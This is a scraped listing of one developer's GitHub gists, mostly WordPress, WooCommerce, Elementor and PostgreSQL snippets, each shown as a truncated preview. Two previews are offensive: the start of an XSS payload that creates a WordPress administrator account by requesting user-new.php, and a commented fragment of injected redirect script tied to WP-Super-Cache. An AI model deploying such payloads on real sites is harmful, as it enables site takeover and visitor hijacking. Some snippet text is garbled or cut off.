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寫 code 不一定會幫你賺到錢,但會寫 code 能生活的有意思點。

一介資男 nczz

寫 code 不一定會幫你賺到錢,但會寫 code 能生活的有意思點。
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nczz / wordpress-add-admin-xss.js
Last active May 25, 2019 05:21
XSS 建立 WordPress 後台帳號的範例
var wp_root = "" // don't add a trailing slash
var req = new XMLHttpRequest();
var url = wp_root + "/wp-admin/user-new.php";
var regex = /ser" value="([^"]*?)"/g;"GET", url, false);
nczz / gutenberg_blocks_menu.php
Created May 15, 2019 06:16
Gutenberg 可重複使用區塊掛載選單
add_action('admin_menu', function () {
add_menu_page('Gutenberg Blocks', 'Gutenberg Blocks', 'manage_options', 'edit.php?post_type=wp_block', '', 'dashicons-admin-generic');
nczz / web_exploit.js
Created May 14, 2019 12:41
// From:
// var bb = 1;var gsd = 1;var tsd = 1; var c = ""; document.location.replace(c);window.location.href=c;document.location.href=c;
// WP-Super-Cache
nczz / woocommerce_email_recipient_cancelled_failed_order_email.php
Created May 9, 2019 15:38
[WordPress] WooCommerce 訂單取消或失敗發信通知客戶
add_filter( 'woocommerce_email_recipient_cancelled_order', 'wc_cancelled_order_add_customer_email', 10, 2 );
add_filter( 'woocommerce_email_recipient_failed_order', 'wc_cancelled_order_add_customer_email', 10, 2 );
function wc_cancelled_order_add_customer_email( $recipient, $order ){
// Avoiding errors in backend (mandatory when using $order argument)
if ( ! is_a( $order, 'WC_Order' ) ) return $recipient;
return $recipient .= "," . $order->get_billing_email();
nczz / wp_replace_images_from_external_source.php
Last active May 31, 2019 12:42
WordPress Headless Replace Images From External Source
** Blogger 文章匯入使用內建匯入工具,不過圖片抓取機制鳥到爆,預設只會抓取文章封面圖,其他文章內的圖片都需要抓取的話就要跑這隻!
include 'wp-load.php';
ini_set('memory_limit', '256M');
add_action('after_setup_theme', function () {
add_filter('intermediate_image_sizes', '__return_empty_array');
nczz / ks_elementor_widgets.php
Last active May 2, 2019 16:23
新增客製化 Elementor 小工具的方法
define('KS_MINIMUM_PHP_VERSION', 5.6); //定義最小支援的 PHP 版本
define('KS_MINIMUM_ELEMENTOR_VERSION', 2.0); //定義最小支援的 Elementor 版本
$ks_ele_widget_enable = true;
// Check if Elementor installed and activated
if (!did_action('elementor/loaded')) {
add_action('admin_notices', function () {
$message = sprintf(
nczz /
Last active April 8, 2019 13:56
檢查 iDempiere 資料庫是否有需要更新
ADDPG=${2} # i.e. "-h localhost -p 5432"
psql -d $DATABASE -U $USER $ADDPG -q -t -c "select name from adempiere.ad_migrationscript" | sed -e 's:^ ::' | grep -v '^$' | sort > /tmp/lisDB.txt
nczz /
Created March 3, 2019 05:24 — forked from AtulKsol/
Solution of psql: FATAL: Peer authentication failed for user “postgres” (or any user)

psql: FATAL: Peer authentication failed for user “postgres” (or any user)

The connection failed because by default psql connects over UNIX sockets using peer authentication, that requires the current UNIX user to have the same user name as psql. So you will have to create the UNIX user postgres and then login as postgres or use sudo -u postgres psql database-name for accessing the database (and psql should not ask for a password).

If you cannot or do not want to create the UNIX user, like if you just want to connect to your database for ad hoc queries, forcing a socket connection using psql --host=localhost --dbname=database-name --username=postgres (as pointed out by @meyerson answer) will solve your immediate problem.

But if you intend to force password authentication over Unix sockets instead of the peer method, try changing the following pg_hba.conf* line:


nczz /
Last active February 25, 2019 10:28 — forked from alistairewj/
Install PostgreSQL 10 on Ubuntu

Install PostgreSQL 10 on Ubuntu

This is a quick guide to install PostgreSQL 10 - tested on Ubuntu 16.04 but likely can be used for Ubuntu 14.04 and 17.04 as well, with one minor modification detailed below.

(Optional) Uninstall other versions of postgres

To make life simple, remove all other versions of Postgres. Obviously not required, but again, makes life simple.

dpkg -l | grep postgres
nczz / replace_short_link.php
Last active February 14, 2019 19:03
放在 WordPress 安裝的根目錄下執行~